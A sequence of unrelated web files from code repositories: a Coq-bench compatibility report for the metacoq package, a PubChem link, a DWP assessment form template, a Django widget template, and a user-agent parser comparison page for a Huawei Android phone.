<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>metacoq: Not compatible 👼</title> <link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" /> <link href="../../../../../bootstrap.min.css" rel="stylesheet"> <link href="../../../../../bootstrap-custom.css" rel="stylesheet"> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <script src="../../../../../moment.min.js"></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div class="container"> <div class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li><a href="../..">clean / released</a></li> <li class="active"><a href="">8.11.0 / metacoq - 1.0~beta1+8.11</a></li> </ul> </div> </div> </div> <div class="article"> <div class="row"> <div class="col-md-12"> <a href="../..">« Up</a> <h1> metacoq <small> 1.0~beta1+8.11 <span class="label label-info">Not compatible 👼</span> </small> </h1> <p>📅 <em><script>document.write(moment("2021-10-28 09:54:59 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2021-10-28 09:54:59 UTC)</em><p> <h2>Context</h2> <pre># Packages matching: installed # Name # Installed # Synopsis base-bigarray base base-num base Num library distributed with the OCaml compiler base-threads base base-unix base conf-findutils 1 Virtual package relying on findutils coq 8.11.0 Formal proof management system num 0 The Num library for arbitrary-precision integer and rational arithmetic ocaml 4.05.0 The OCaml compiler (virtual package) ocaml-base-compiler 4.05.0 Official 4.05.0 release ocaml-config 1 OCaml Switch Configuration ocamlfind 1.9.1 A library manager for OCaml # opam file: opam-version: &quot;2.0&quot; maintainer: &quot;matthieu.sozeau@inria.fr&quot; homepage: &quot;https://metacoq.github.io/metacoq&quot; dev-repo: &quot;git+https://github.com/MetaCoq/metacoq.git#coq-8.11&quot; bug-reports: &quot;https://github.com/MetaCoq/metacoq/issues&quot; authors: [&quot;Abhishek Anand &lt;aa755@cs.cornell.edu&gt;&quot; &quot;Simon Boulier &lt;simon.boulier@inria.fr&gt;&quot; &quot;Cyril Cohen &lt;cyril.cohen@inria.fr&gt;&quot; &quot;Yannick Forster &lt;forster@ps.uni-saarland.de&gt;&quot; &quot;Fabian Kunze &lt;fkunze@fakusb.de&gt;&quot; &quot;Gregory Malecha &lt;gmalecha@gmail.com&gt;&quot; &quot;Matthieu Sozeau &lt;matthieu.sozeau@inria.fr&gt;&quot; &quot;Nicolas Tabareau &lt;nicolas.tabareau@inria.fr&gt;&quot; &quot;Théo Winterhalter &lt;theo.winterhalter@inria.fr&gt;&quot; ] license: &quot;MIT&quot; depends: [ &quot;ocaml&quot; {&gt;= &quot;4.07.1&quot;} &quot;coq&quot; {&gt;= &quot;8.11&quot; &amp; &lt; &quot;8.12~&quot;} &quot;coq-metacoq-template&quot; {= version} &quot;coq-metacoq-checker&quot; {= version} &quot;coq-metacoq-pcuic&quot; {= version} &quot;coq-metacoq-safechecker&quot; {= version} &quot;coq-metacoq-erasure&quot; {= version} &quot;coq-metacoq-translations&quot; {= version} ] synopsis: &quot;A meta-programming framework for Coq&quot; description: &quot;&quot;&quot; MetaCoq is a meta-programming framework for Coq. The meta-package includes the template-coq library, unverified checker for Coq, PCUIC development including a verified translation from Coq to PCUIC, safe checker and erasure for PCUIC and example translations. See individual packages for more detailed descriptions. &quot;&quot;&quot; url { src: &quot;https://github.com/MetaCoq/metacoq/archive/v1.0-beta1-8.11.tar.gz&quot; checksum: &quot;sha256=1644c5bd9d02385c802535c6c46dbcaf279afcecd4ffb3da5fae08618c628c75&quot; } </pre> <h2>Lint</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Dry install 🏜️</h2> <p>Dry install with the current Coq version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam install -y --show-action coq-metacoq.1.0~beta1+8.11 coq.8.11.0</code></dd> <dt>Return code</dt> <dd>5120</dd> <dt>Output</dt> <dd><pre>[NOTE] Package coq is already installed (current version is 8.11.0). The following dependencies couldn&#39;t be met: - coq-metacoq -&gt; ocaml &gt;= 4.07.1 base of this switch (use `--unlock-base&#39; to force) No solution found, exiting </pre></dd> </dl> <p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-metacoq.1.0~beta1+8.11</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Install dependencies</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Install 🚀</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Installation size</h2> <p>No files were installed.</p> <h2>Uninstall 🧹</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Missing removes</dt> <dd> none </dd> <dt>Wrong removes</dt> <dd> none </dd> </dl> </div> </div> </div> <hr/> <div class="footer"> <p class="text-center"> Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣 </p> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="../../../../../bootstrap.min.js"></script> </body> </html>
coq-bench/coq-bench.github.io
clean/Linux-x86_64-4.05.0-2.0.1/released/8.11.0/metacoq/1.0~beta1+8.11.html
HTML
mit
7,589
https://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?cid=1068
andrewdefries/ToxCast
Figure4/FDA_Pesticides/PCID_1068.html
HTML
mit
62
{% extends path+"/_layout-case-action.html" %} {% block citizen_content %} {{ data.nuggets | log }} <p class="no-kdBar"><a href="javascript: history.go(-1)" class="link-back">Back</a></p> <h1 class="heading-large mt10 "> <span class="heading-secondary">Mental state examination</span> Insight</h1> <div class="grid-row"> <div class="column-two-thirds"> <p>Things you should be assessing</p> <ul class="list list-bullet"> <li>Insight</li> <li>Awareness of danger</li> </ul> {% if data['lcwra']==='lcwra1'%} {% elif data['lcwra']==='lcwra2' or data['lcwra']==='lcwra3' or data['lcwra']==='lcwra4' or data['lcwra']==='lcwra6' or data['lcwra']==='lcwra7' or data['lcwra']==='lcwra8' or data['lcwra']==='lcwra9' or data['lcwra']==='lcwra10' or data['lcwra']==='lcwra11' or data['lcwra']==='lcwra12' or data['lcwra']==='lcwra13' or data['lcwra']==='lcwra14' or data['lcwra']==='lcwra15' or data['lcwra']==='lcwra16' or data['lcwra']==='lcwra17' or data['lcwra']==='lcwra18' or data['lcwra']==='lcwra19' or data['lcwra']==='lcwra20'%} <form action="mentalHealthAssessmentCurtail" method="POST" class="form"> {% else %}<form action="mentalHealthAssessment" method="POST" class="form">{% endif %} <div class="form-group"> <label class="form-label-bold" for="mh-insight">Observation</label> <textarea class="form-control form-control-3-4" name="mhinsight" id="mh-insight" rows="8">{{mhinsight}}</textarea> </div> <input type="submit" class="button" value="Save"> <div class="multiple-choice" style="display:none"> <input id="radio-inline-4" type="radio" name="Insight" value="Insight" checked> <label for="radio-4">hidden radio one</label> </div> </form> </div><!-- column --> </div><!-- row --> {% endblock %} {% block footer_top %} {% endblock %} {% block page_scripts %} {% endblock %}
dwpdigitaltech/healthanddisability
app/views/fha/v8/assessment/evidence/mh-insight.html
HTML
mit
1,924
<label{% if widget.attrs.id %} for="{{ widget.attrs.id }}"{% endif %}> {% for column in widget.columns %} <span class="icon-admin {{ column }}"></span> {% endfor %} <br/> {% include "django/forms/widgets/input.html" %} {{ widget.label }}</label>
Blueshoe/djangocms-layouter
layouter/templates/layouter/radio_option.html
HTML
mit
245
<html> <head> <title>User agent detail - Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> </head> <body> <div class="container"> <div class="section"> <h1 class="header center orange-text">User agent detail</h1> <div class="row center"> <h5 class="header light"> Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 </h5> </div> </div> <div class="section"> <table class="striped"><tr><th></th><th colspan="3">General</th><th colspan="5">Device</th><th colspan="3">Bot</th><th colspan="2"></th></tr><tr><th>Provider</th><th>Browser</th><th>Engine</th><th>OS</th><th>Brand</th><th>Model</th><th>Type</th><th>Is mobile</th><th>Is touch</th><th>Is bot</th><th>Name</th><th>Type</th><th>Parse time</th><th>Actions</th></tr><tr><th colspan="14" class="green lighten-3">Source result (test suite)</th></tr><tr><td>ua-parser/uap-core<br /><small>vendor/thadafinser/uap-core/tests/test_device.yaml</small></td><td> </td><td> </td><td> </td><td style="border-left: 1px solid #555">Huawei</td><td>U8800 Pro</td><td></td><td></td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td></td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-test">Detail</a> <!-- Modal Structure --> <div id="modal-test" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Testsuite result detail</h4> <p><pre><code class="php">Array ( [user_agent_string] => Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 [family] => U8800 Pro [brand] => Huawei [model] => U8800 Pro ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><th colspan="14" class="green lighten-3">Providers</th></tr><tr><td>BrowscapPhp<br /><small>6012</small></td><td>Android 4.0</td><td>WebKit </td><td>Android 2.2</td><td style="border-left: 1px solid #555"></td><td></td><td>Mobile Phone</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.022</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-215ac98d-ccf8-4615-916e-5a819d6a59c9">Detail</a> <!-- Modal Structure --> <div id="modal-215ac98d-ccf8-4615-916e-5a819d6a59c9" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapPhp result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^mozilla\/5\.0 \(.*linux.*android.2\.2.* build\/.*\).*applewebkit\/.*\(.*khtml,.*like gecko.*\).*version\/4\.0.*safari.*$/ [browser_name_pattern] => mozilla/5.0 (*linux*android?2.2* build/*)*applewebkit/*(*khtml,*like gecko*)*version/4.0*safari* [parent] => Android Browser 4.0 [comment] => Android Browser 4.0 [browser] => Android [browser_type] => Browser [browser_bits] => 32 [browser_maker] => Google Inc [browser_modus] => unknown [version] => 4.0 [majorver] => 4 [minorver] => 0 [platform] => Android [platform_version] => 2.2 [platform_description] => Android OS [platform_bits] => 32 [platform_maker] => Google Inc [alpha] => [beta] => [win16] => [win32] => [win64] => [frames] => 1 [iframes] => 1 [tables] => 1 [cookies] => 1 [backgroundsounds] => [javascript] => 1 [vbscript] => [javaapplets] => 1 [activexcontrols] => [ismobiledevice] => 1 [istablet] => [issyndicationreader] => [crawler] => [cssversion] => 3 [aolversion] => 0 [device_name] => general Mobile Phone [device_maker] => unknown [device_type] => Mobile Phone [device_pointing_method] => touchscreen [device_code_name] => general Mobile Phone [device_brand_name] => unknown [renderingengine_name] => WebKit [renderingengine_version] => unknown [renderingengine_description] => For Google Chrome, iOS (including both mobile Safari, WebViews within third-party apps, and web clips), Safari, Arora, Midori, OmniWeb, Shiira, iCab since version 4, Web, SRWare Iron, Rekonq, and in Maxthon 3. [renderingengine_maker] => Apple Inc ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>DonatjUAParser<br /><small>v0.5.0</small></td><td>Android Browser 4.0</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-f1436016-fdf1-4aea-b4be-1d7c99ab0661">Detail</a> <!-- Modal Structure --> <div id="modal-f1436016-fdf1-4aea-b4be-1d7c99ab0661" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>DonatjUAParser result detail</h4> <p><pre><code class="php">Array ( [platform] => Android [browser] => Android Browser [version] => 4.0 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>NeutrinoApiCom<br /><small></small></td><td>Android Webkit 4.0</td><td><i class="material-icons">close</i></td><td>Android 2.2.2</td><td style="border-left: 1px solid #555">Huawei</td><td>U8800 Pro</td><td>mobile-browser</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.26208</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-9b0fa449-ec1b-40c8-8b1c-9486eb3b9cbc">Detail</a> <!-- Modal Structure --> <div id="modal-9b0fa449-ec1b-40c8-8b1c-9486eb3b9cbc" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>NeutrinoApiCom result detail</h4> <p><pre><code class="php">stdClass Object ( [mobile_screen_height] => 800 [is_mobile] => 1 [type] => mobile-browser [mobile_brand] => Huawei [mobile_model] => U8800 Pro [version] => 4.0 [is_android] => 1 [browser_name] => Android Webkit [operating_system_family] => Android [operating_system_version] => 2.2.2 [is_ios] => [producer] => Google Inc. [operating_system] => Android 2.2.x Froyo [mobile_screen_width] => 480 [mobile_browser] => Android Webkit ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>PiwikDeviceDetector<br /><small>3.5.2</small></td><td>Android Browser </td><td>WebKit </td><td>Android 2.2</td><td style="border-left: 1px solid #555">Huawei</td><td>U8800Pro</td><td>smartphone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.005</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-21638055-738d-46ba-a1b1-f5114bc26475">Detail</a> <!-- Modal Structure --> <div id="modal-21638055-738d-46ba-a1b1-f5114bc26475" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>PiwikDeviceDetector result detail</h4> <p><pre><code class="php">Array ( [client] => Array ( [type] => browser [name] => Android Browser [short_name] => AN [version] => [engine] => WebKit ) [operatingSystem] => Array ( [name] => Android [short_name] => AND [version] => 2.2 [platform] => ) [device] => Array ( [brand] => HU [brandName] => Huawei [model] => U8800Pro [device] => 1 [deviceName] => smartphone ) [bot] => [extra] => Array ( [isBot] => [isBrowser] => 1 [isFeedReader] => [isMobileApp] => [isPIM] => [isLibrary] => [isMediaPlayer] => [isCamera] => [isCarBrowser] => [isConsole] => [isFeaturePhone] => [isPhablet] => [isPortableMediaPlayer] => [isSmartDisplay] => [isSmartphone] => 1 [isTablet] => [isTV] => [isDesktop] => [isMobile] => 1 [isTouchEnabled] => ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>SinergiBrowserDetector<br /><small>6.0.0</small></td><td>Navigator 4.0</td><td><i class="material-icons">close</i></td><td>Android 2.2.2</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td></td><td><i class="material-icons">close</i></td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-5415e7f2-ef7b-434c-abe0-b71ba9f6707c">Detail</a> <!-- Modal Structure --> <div id="modal-5415e7f2-ef7b-434c-abe0-b71ba9f6707c" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>SinergiBrowserDetector result detail</h4> <p><pre><code class="php">Array ( [browser] => Sinergi\BrowserDetector\Browser Object ( [userAgent:Sinergi\BrowserDetector\Browser:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 ) [name:Sinergi\BrowserDetector\Browser:private] => Navigator [version:Sinergi\BrowserDetector\Browser:private] => 4.0 [isRobot:Sinergi\BrowserDetector\Browser:private] => [isChromeFrame:Sinergi\BrowserDetector\Browser:private] => ) [operatingSystem] => Sinergi\BrowserDetector\Os Object ( [name:Sinergi\BrowserDetector\Os:private] => Android [version:Sinergi\BrowserDetector\Os:private] => 2.2.2 [isMobile:Sinergi\BrowserDetector\Os:private] => 1 [userAgent:Sinergi\BrowserDetector\Os:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 ) ) [device] => Sinergi\BrowserDetector\Device Object ( [name:Sinergi\BrowserDetector\Device:private] => unknown [userAgent:Sinergi\BrowserDetector\Device:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 ) ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UAParser<br /><small>v3.4.5</small></td><td>Android 2.2.2</td><td><i class="material-icons">close</i></td><td>Android 2.2.2</td><td style="border-left: 1px solid #555">Huawei</td><td>U8800 Pro</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.003</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-346c1a98-5fd3-454f-b6c8-350f2f505d8b">Detail</a> <!-- Modal Structure --> <div id="modal-346c1a98-5fd3-454f-b6c8-350f2f505d8b" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UAParser result detail</h4> <p><pre><code class="php">UAParser\Result\Client Object ( [ua] => UAParser\Result\UserAgent Object ( [major] => 2 [minor] => 2 [patch] => 2 [family] => Android ) [os] => UAParser\Result\OperatingSystem Object ( [major] => 2 [minor] => 2 [patch] => 2 [patchMinor] => [family] => Android ) [device] => UAParser\Result\Device Object ( [brand] => Huawei [model] => U8800 Pro [family] => U8800 Pro ) [originalUserAgent] => Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UserAgentStringCom<br /><small></small></td><td>Android Webkit Browser </td><td><i class="material-icons">close</i></td><td>Android 2.2.2</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.14904</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-9cdd8b45-a2eb-406b-bd27-7e48af38ffd4">Detail</a> <!-- Modal Structure --> <div id="modal-9cdd8b45-a2eb-406b-bd27-7e48af38ffd4" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UserAgentStringCom result detail</h4> <p><pre><code class="php">stdClass Object ( [agent_type] => Browser [agent_name] => Android Webkit Browser [agent_version] => -- [os_type] => Android [os_name] => Android [os_versionName] => [os_versionNumber] => 2.2.2 [os_producer] => [os_producerURL] => [linux_distibution] => Null [agent_language] => Bulgarian (Bulgaria) [agent_languageTag] => bg-bg ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhatIsMyBrowserCom<br /><small></small></td><td>Android Browser 4.0</td><td>WebKit 533.1</td><td>Android 2.2.2</td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.40612</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-9795f66f-7271-430e-973a-a5c0e14dc35a">Detail</a> <!-- Modal Structure --> <div id="modal-9795f66f-7271-430e-973a-a5c0e14dc35a" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhatIsMyBrowserCom result detail</h4> <p><pre><code class="php">stdClass Object ( [operating_system_name] => Android [simple_sub_description_string] => [simple_browser_string] => Android Browser 4 on Android (Froyo) [browser_version] => 4 [extra_info] => Array ( ) [operating_platform] => [extra_info_table] => stdClass Object ( [System Build] => HuaweiU8800Pro ) [layout_engine_name] => WebKit [detected_addons] => Array ( ) [operating_system_flavour_code] => [hardware_architecture] => [operating_system_flavour] => [operating_system_frameworks] => Array ( ) [browser_name_code] => android-browser [operating_system_version] => Froyo [simple_operating_platform_string] => [is_abusive] => [layout_engine_version] => 533.1 [browser_capabilities] => Array ( ) [operating_platform_vendor_name] => [operating_system] => Android (Froyo) [operating_system_version_full] => 2.2.2 [operating_platform_code] => [browser_name] => Android Browser [operating_system_name_code] => android [user_agent] => Mozilla/5.0 (Linux; U; Android 2.2.2; bg-bg; U8800 Pro Build/HuaweiU8800Pro) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 [browser_version_full] => 4.0 [browser] => Android Browser 4 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhichBrowser<br /><small>2.0.10</small></td><td>Android Browser </td><td>Webkit 533.1</td><td>Android 2.2.2</td><td style="border-left: 1px solid #555">Huawei</td><td>IDEOS X5 Pro</td><td>mobile:smart</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.018</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-342c8d32-4765-40a8-8a5c-af3a38d19ae4">Detail</a> <!-- Modal Structure --> <div id="modal-342c8d32-4765-40a8-8a5c-af3a38d19ae4" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhichBrowser result detail</h4> <p><pre><code class="php">Array ( [browser] => Array ( [name] => Android Browser ) [engine] => Array ( [name] => Webkit [version] => 533.1 ) [os] => Array ( [name] => Android [version] => 2.2.2 ) [device] => Array ( [type] => mobile [subtype] => smart [manufacturer] => Huawei [model] => IDEOS X5 Pro ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Woothee<br /><small>v1.2.0</small></td><td>Safari 4.0</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>smartphone</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-3f285ff5-314b-4db4-9948-54572e92e7b6">Detail</a> <!-- Modal Structure --> <div id="modal-3f285ff5-314b-4db4-9948-54572e92e7b6" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Woothee result detail</h4> <p><pre><code class="php">Array ( [name] => Safari [vendor] => Apple [version] => 4.0 [category] => smartphone [os] => Android [os_version] => 2.2.2 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Wurfl<br /><small>1.6.4</small></td><td>Android Webkit 2.2</td><td><i class="material-icons">close</i></td><td>Android 2.2</td><td style="border-left: 1px solid #555">Huawei</td><td>U8800 Pro</td><td>Smartphone</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.073</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-1a1aee36-7ce7-4111-a391-8e2c501f1532">Detail</a> <!-- Modal Structure --> <div id="modal-1a1aee36-7ce7-4111-a391-8e2c501f1532" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Wurfl result detail</h4> <p><pre><code class="php">Array ( [virtual] => Array ( [is_android] => true [is_ios] => false [is_windows_phone] => false [is_app] => false [is_full_desktop] => false [is_largescreen] => true [is_mobile] => true [is_robot] => false [is_smartphone] => true [is_touchscreen] => true [is_wml_preferred] => false [is_xhtmlmp_preferred] => false [is_html_preferred] => true [advertised_device_os] => Android [advertised_device_os_version] => 2.2 [advertised_browser] => Android Webkit [advertised_browser_version] => 2.2 [complete_device_name] => Huawei U8800 Pro [form_factor] => Smartphone [is_phone] => true [is_app_webview] => false ) [all] => Array ( [brand_name] => Huawei [model_name] => U8800 Pro [unique] => true [ununiqueness_handler] => [is_wireless_device] => true [device_claims_web_support] => true [has_qwerty_keyboard] => true [can_skip_aligned_link_row] => true [uaprof] => [uaprof2] => [uaprof3] => [nokia_series] => 0 [nokia_edition] => 0 [device_os] => Android [mobile_browser] => Android Webkit [mobile_browser_version] => [device_os_version] => 2.2 [pointing_method] => touchscreen [release_date] => 2011_july [marketing_name] => [model_extra_info] => [nokia_feature_pack] => 0 [can_assign_phone_number] => true [is_tablet] => false [manufacturer_name] => [is_bot] => false [is_google_glass] => false [proportional_font] => false [built_in_back_button_support] => false [card_title_support] => true [softkey_support] => false [table_support] => true [numbered_menus] => false [menu_with_select_element_recommended] => false [menu_with_list_of_links_recommended] => true [icons_on_menu_items_support] => false [break_list_of_links_with_br_element_recommended] => true [access_key_support] => false [wrap_mode_support] => false [times_square_mode_support] => false [deck_prefetch_support] => false [elective_forms_recommended] => true [wizards_recommended] => false [image_as_link_support] => false [insert_br_element_after_widget_recommended] => false [wml_can_display_images_and_text_on_same_line] => false [wml_displays_image_in_center] => false [opwv_wml_extensions_support] => false [wml_make_phone_call_string] => wtai://wp/mc; [chtml_display_accesskey] => false [emoji] => false [chtml_can_display_images_and_text_on_same_line] => false [chtml_displays_image_in_center] => false [imode_region] => none [chtml_make_phone_call_string] => tel: [chtml_table_support] => false [xhtml_honors_bgcolor] => true [xhtml_supports_forms_in_table] => true [xhtml_support_wml2_namespace] => false [xhtml_autoexpand_select] => false [xhtml_select_as_dropdown] => false [xhtml_select_as_radiobutton] => false [xhtml_select_as_popup] => false [xhtml_display_accesskey] => false [xhtml_supports_invisible_text] => false [xhtml_supports_inline_input] => false [xhtml_supports_monospace_font] => false [xhtml_supports_table_for_layout] => true [xhtml_supports_css_cell_table_coloring] => true [xhtml_format_as_css_property] => false [xhtml_format_as_attribute] => false [xhtml_nowrap_mode] => false [xhtml_marquee_as_css_property] => false [xhtml_readable_background_color1] => #FFFFFF [xhtml_readable_background_color2] => #FFFFFF [xhtml_allows_disabled_form_elements] => true [xhtml_document_title_support] => true [xhtml_preferred_charset] => iso-8859-1 [opwv_xhtml_extensions_support] => false [xhtml_make_phone_call_string] => tel: [xhtmlmp_preferred_mime_type] => text/html [xhtml_table_support] => true [xhtml_send_sms_string] => sms: [xhtml_send_mms_string] => mms: [xhtml_file_upload] => supported [cookie_support] => true [accept_third_party_cookie] => true [xhtml_supports_iframe] => full [xhtml_avoid_accesskeys] => true [xhtml_can_embed_video] => play_and_stop [ajax_support_javascript] => true [ajax_manipulate_css] => true [ajax_support_getelementbyid] => true [ajax_support_inner_html] => true [ajax_xhr_type] => standard [ajax_manipulate_dom] => true [ajax_support_events] => true [ajax_support_event_listener] => true 